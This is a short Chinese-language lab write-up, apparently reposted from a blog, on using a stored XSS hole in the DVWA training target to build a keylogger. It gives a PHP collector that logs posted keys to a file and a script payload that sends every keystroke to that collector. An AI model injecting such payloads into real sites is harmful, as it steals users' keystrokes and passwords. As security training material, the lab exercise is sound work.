實驗環境：

• PHPstudy
• 火狐瀏覽器、IE
• DVWA靶場

實驗準備：

在www目錄下創建一個名為keylog.php的文件,代碼如下：

<?php $file = fopen("key.txt","a"); if(isset($_REQUEST['key'])) {$key = $_REQUEST['key'];fputs($file,$key); } ?>

模擬實驗：

1、把級別調成low，選擇Stored儲存型，打開F12將輸入限制改為500

2、將下列代碼輸入執行，效果如下

<script>document.onkeydown=function(ev){xhr=new XMLHttpRequest();xhr.open('POST','http://localhost/keylog.php',true);xhr.setRequestHeader('Content-type','application/X-WWW-form-urlencoded');xhr.send('key='+String.fromCharCode(ev.keyCode));}</script>

3、然后隨便輸入什么東西，key.txt中就會出現記錄，鍵盤記錄器就做完了

總結

以上是生活随笔為你收集整理的漏洞复现篇——利用XSS漏洞实现键盘记录的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。